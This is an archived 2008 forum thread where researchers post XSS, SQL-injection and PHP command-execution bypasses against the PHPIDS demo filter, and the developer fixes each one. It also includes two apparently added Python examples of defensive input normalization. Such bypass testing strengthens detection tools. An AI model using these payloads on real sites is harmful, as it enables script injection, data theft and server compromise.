Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: kuza55
Date: February 26, 2008 11:58PM

I don't really follow this thread, so I have no idea if this has been mentioned before, but sometimes you don't need to be able to execute code to execute code, if you know what I mean, e.g.

document.domain=name (set name to com or org or net, or whatever the TLD is)

seems to get past the filter on php-ids.org

Also, you can make it even simpler by overwriting an object inside the window object (i.e. something global), so you don't need the dot, e.g.

location=name (set name to javascript:whatever)

but that doesn't get past the filter, since you seem to flag on location=

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: February 27, 2008 06:18AM

Hi kuza55!

Yep - I dunno why domain was left out in the rules - it is now included. We had a serious wave of $=property injections several months ago but those issues should be fixed.

Greetings,
.mario

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: February 29, 2008 08:52AM

The = ' XSS without being noticed '.constructor.constructor
The ( decodeURI( 'aler%74%281%29' ) )
()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: February 29, 2008 04:51PM

Fixed six hours ago :)

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: thornmaker
Date: February 29, 2008 07:10PM

constructor attacks again: http://p42.us/phpids/62.html

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: March 01, 2008 06:37AM

1' *( @a)or 1 LIKE '1 http://demo.php-ids.org/?test=1'%20*(%20@a)or%201%20LIKE%20'1
1'%column LIKE'0 http://demo.php-ids.org/?test=1'%column%20LIKE'0
aa'%@var -1 or 1 SOUNDS LIKE(1)|'+1
1'&&column or'1 http://demo.php-ids.org/?test=1'%26%26column%20or'1
1'%column or 1 LIKE '1
1'< column or 1 LIKE'1
...
vuln operands: %, <, ^, /, &

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: March 01, 2008 09:07AM

Script attack + Thornmaker's $ bypass:-
http://www.businessinfo.co.uk/labs/phpids/phpids1.html

Because I can't be bothered uploading a file each time I create a window.name payload, I've created a simple bookmarklet:-
javascript:namePayload=prompt('Enter payload');url=prompt('Enter url');html = '<iframe src="http://demo.phpids.org/?test='+url+'" name="'+namePayload+'"><\/iframe>';self.location="data:text/html,"+html;




Edited 2 time(s). Last edit at 03/03/2008 03:27AM by Gareth Heyes.

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: March 01, 2008 02:07PM

Wow - what a hailstorm ;) And all of them are pretty hard to fix. I will ping back if the problems are solved - thx!

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: March 01, 2008 02:55PM

Phew - tough ones but all fixed. The XSSes even got a whole new rule because I think the constructor thing has more potential...

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: March 01, 2008 03:09PM

new bug:

1' -1 or '1 http://demo.php-ids.org/?test=1'%20-1%20or%20'1
1' -1 - column or '1
1' -1 or+1= '+1

greetings :)



Edited 1 time(s). Last edit at 03/01/2008 03:14PM by Reiners.

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: March 01, 2008 05:46PM

Phew - nice and fixed ;)

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: thornmaker
Date: March 01, 2008 11:36PM

http://p42.us/phpids/63.html
the injection is:
x=1+name
eval(x)
which only works when passed in as a url parameter. Looks like a bug.

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: March 02, 2008 06:06AM

fixes seem fine to me, good work :)

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: March 03, 2008 03:26AM

@thornmaker: A bug indeed - the input from the textarea is automatically using a carriage return AND a line break while the url example exclusively uses a line break. Fixed!

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: April 25, 2008 04:26AM

Maybe exploitable, works in IE I think

document.charset='UTF-7'

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: April 26, 2008 12:15PM

Yep - it works. Could be handy if content length restrictions apply and other parameters get reflected later. 10x!

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: thornmaker
Date: May 10, 2008 11:49PM

bypass: (x)setter=0?0.:alert,x=0

notes: I can't figure out how to turn the alert into a two-stage eval. The best I can come up with is this, which has an overall impact of 3. While I'm at it, this one almost works too and has an overall impact of 4. Maybe someone can improve on them...

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: fragge
Date: May 11, 2008 06:38PM

thornmaker Wrote:
-------------------------------------------------------
> bypass: (x)setter=0?0.:alert,x=0

NICE. crazy O_O

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 13, 2008 06:37AM

Wow - nice ones. fixed in rev .888 - 0.4.8 is close ;) Thanks!

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 20, 2008 01:14AM

200,000, home, stop,back, blur, print,Script ('scroll,\valert(1),scroll')
()

Also works with:-
200,000, home, stop,back, blur, print,Script ('scroll,\veval(\vname),scroll')
()




Edited 1 time(s). Last edit at 05/20/2008 01:16AM by Gareth Heyes.

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: thornmaker
Date: May 20, 2008 01:35AM

\v ftw!

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 20, 2008 07:43AM

Here's almost a pure XSS:-
Input not considered malicious by the PHPIDS will be displayed unfiltered - input considered malicious will be displayed sanitized<applet/src/type=
text/html onload=200,000,home,stop,back,blur,print,Script(code)() code=ale alt=rt(1) Input not considered malicious by the PHPIDS will be displayed unfiltered - input considered malicious will be displayed sanitized

I really need to get back to work now, so if anyone wants to try and improve the vector above then please do.

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 20, 2008 08:40AM

Scary no?

<applet/src=http://businessinfo.co.uk/labs/xss.html
type=text/html>

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 21, 2008 04:24AM

Scary indeed - and fixed. I didn't expect either the vertical tab issue or that applets wouldn't be detected... 0.4.8 as soon as I am back home from Belgium ;)

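The two filter misses above (the CR+LF versus LF-only input of the `x=1+name` / `eval(x)` pair, and the vertical tab inside the `Script(...)` string) share one root cause: rules were matched against input whose whitespace had not been normalized. The following is an added example, not PHPIDS code and not from any poster in this thread, of the canonicalization step a detection engine should run before its rules. The rule set and sample inputs are constructed for illustration; the narrow `[ \t\r\n]` whitespace class is written out explicitly to stand in for a rule (or regex engine) whose notion of whitespace excludes the vertical tab, which browsers do accept as JavaScript whitespace.

```python
import re

# Characters to treat as one kind of whitespace before any rule runs. This is
# a constructed list for the example: CR and LF so that the textarea (CRLF) and
# URL (LF) forms of a payload canonicalize to the same string, plus vertical
# tab (0x0B), form feed (0x0C) and NBSP, which browsers accept as JavaScript
# whitespace but which a rule written against "[ \t\r\n]" silently misses.
ANY_WS = re.compile(r"[ \t\r\n\x0b\x0c\u00a0]+")


def canonicalize(payload):
    """Collapse every whitespace run, whatever its encoding, to a single space."""
    return ANY_WS.sub(" ", payload).strip()


# Deliberately narrow whitespace class, written out instead of \s so the
# example reproduces the failure mode regardless of which engine runs it.
_WS = r"[ \t\r\n]*"

# Constructed illustrative rules; they are not the PHPIDS rule set.
RULES = {
    # a sink call at the start of an expression: ",alert(" or "(eval("
    "sink_call": re.compile(r"(?:^|[,;(])" + _WS + r"(?:alert|eval)" + _WS + r"\("),
    # window.name consumed, then eval'd in the following statement
    "name_then_eval": re.compile(r"\bname\b" + _WS + r";?" + _WS + r"eval" + _WS + r"\("),
}


def scan(payload, canonical=True):
    """Names of the rules that fire; canonical=False skips normalization."""
    text = canonicalize(payload) if canonical else payload
    return sorted(name for name, rx in RULES.items() if rx.search(text))


# Constructed samples in the shapes discussed in the thread.
SAMPLES = {
    "textarea_crlf": "x=1+name\r\neval(x)",
    "url_lf": "x=1+name\neval(x)",
    "vertical_tab": "scroll,\x0balert(1),scroll",
}


def compare():
    """For each sample: (rules firing on raw input, rules firing after canonicalize)."""
    return {k: (scan(v, canonical=False), scan(v)) for k, v in SAMPLES.items()}


if __name__ == "__main__":
    for k, (raw, canon) in compare().items():
        print(f"{k:14s} raw={raw} canonical={canon}")
```

The CRLF and LF samples canonicalize to the identical string, so no rule can treat them differently; the vertical-tab sample is missed by the narrow rule on raw input and caught once the VT has been folded into a plain space.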
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 23, 2008 02:47PM

Impact of 5:-

<a/href=da&#x74&#97:text/html&#59&#x63harset=UTF-7&#44+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test

I tried to bypass with loads of variations; maybe this isn't exploitable with the current data: reg exp rule, but I've posted it because I thought it was cool.

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: May 25, 2008 08:02AM

Hi .mario!
as discussed, php command execution when eval'd:

if(`any command`) die(); (php-ids)

greetings,
Reiners

edit: hmm, well, if you can inject directly into an eval() there are a lot of other vectors, so I guess you don't intend to take care of these anyway ;)



Edited 1 time(s). Last edit at 05/25/2008 09:54AM by Reiners.

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 25, 2008 02:08PM

Hey guys - I just returned home. Will take care asap!

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 26, 2008 03:15AM

@Gareth: Hmmm - I am getting an Impact of 16... but nice vector anyway ;)

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 26, 2008 04:29AM

@mario

Impact 5:-
XSS without being noticed<a/href=da&#x74&#97:text/html&#59&#x63harset=UTF-7&#44+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test

Bypass data but hit entity rule (impact 5):-
XSS without being noticed<a/href=da&#x74&#000000097:text/html&#59&#x63harset=UTF-7&#44+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 26, 2008 07:03AM

@gareth: Yuk - found it - it was a bug in the UTF7 detection. Fixed, thx!!

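The `data:` / `charset=UTF-7` vectors in the last few posts evade a rule in two layers: numeric character references without semicolons or with padded zeros hide the `data:` scheme, and UTF-7 hides the `<script>` tag in the body. The following is an added example, not PHPIDS code and not from any poster here, of the decoding a filter has to perform before matching, so that it sees what the browser will see. The regexes, the report format and the sample hrefs are constructed for this illustration; only the `charset` parameter of the data URI is handled, base64 bodies are out of scope.

```python
import re

# Lenient numeric character reference decoder, constructed for this example.
# It deliberately accepts the forms the thread shows evading a filter: no
# trailing semicolon ("&#x74"), a reference glued to the next letter
# ("&#x63harset" is "c" + "harset"), and long runs of leading zeros
# ("&#000000097" is still "a").
_NUMREF = re.compile(r"&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?")


def decode_numeric_refs(text):
    """Replace &#NNN / &#xHH references (semicolon optional) with their characters."""
    def repl(m):
        cp = int(m.group(1), 16) if m.group(1) else int(m.group(2), 10)
        return chr(cp) if 0 < cp <= 0x10FFFF else m.group(0)
    return _NUMREF.sub(repl, text)


# data:[<mediatype>][;charset=<cs>],<body>  (base64 bodies are not handled here)
_DATA_URI = re.compile(r"^\s*data\s*:\s*([^,]*?)\s*,(.*)$", re.I | re.S)


def analyze_href(href):
    """Decode an href the way a browser would, then report what it actually carries."""
    decoded = decode_numeric_refs(href)
    report = {"decoded": decoded, "is_data_uri": False, "mediatype": None,
              "charset": None, "body": None, "suspicious": False}
    m = _DATA_URI.match(decoded)
    if not m:
        return report
    params = [p.strip().lower() for p in m.group(1).split(";")]
    body = m.group(2)
    charset = next((p.split("=", 1)[1] for p in params if p.startswith("charset=")), None)
    if charset == "utf-7":
        # The browser will interpret the body as UTF-7, so the filter must too:
        # "+ADw-" is "<", and the hidden "<script>" reappears.
        body = body.encode("ascii", "ignore").decode("utf-7", "replace")
    mediatype = params[0] or "text/plain"
    report.update(
        is_data_uri=True, mediatype=mediatype, charset=charset, body=body,
        suspicious=mediatype in ("text/html", "application/xhtml+xml")
        and re.search(r"<\s*script\b", body, re.I) is not None,
    )
    return report


# Constructed samples in the entity-obfuscated data: URI shape from the thread.
UTF7_BODY = "+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4-"
SAMPLE = "da&#x74&#97:text/html&#59&#x63harset=UTF-7&#44" + UTF7_BODY
SAMPLE_ZEROS = "da&#x74&#000000097:text/html&#59&#x63harset=UTF-7&#44" + UTF7_BODY

if __name__ == "__main__":
    for href in (SAMPLE, SAMPLE_ZEROS, "https://example.com/"):
        print(analyze_href(href))
```

Matching `data:` or `charset=UTF-7` on the raw attribute value would never fire on either sample; matching on the decoded value treats the zero-padded and plain forms identically, and decoding the body with the declared charset is what turns an opaque `+ADw...-` run into a `<script>` tag the existing rules can see.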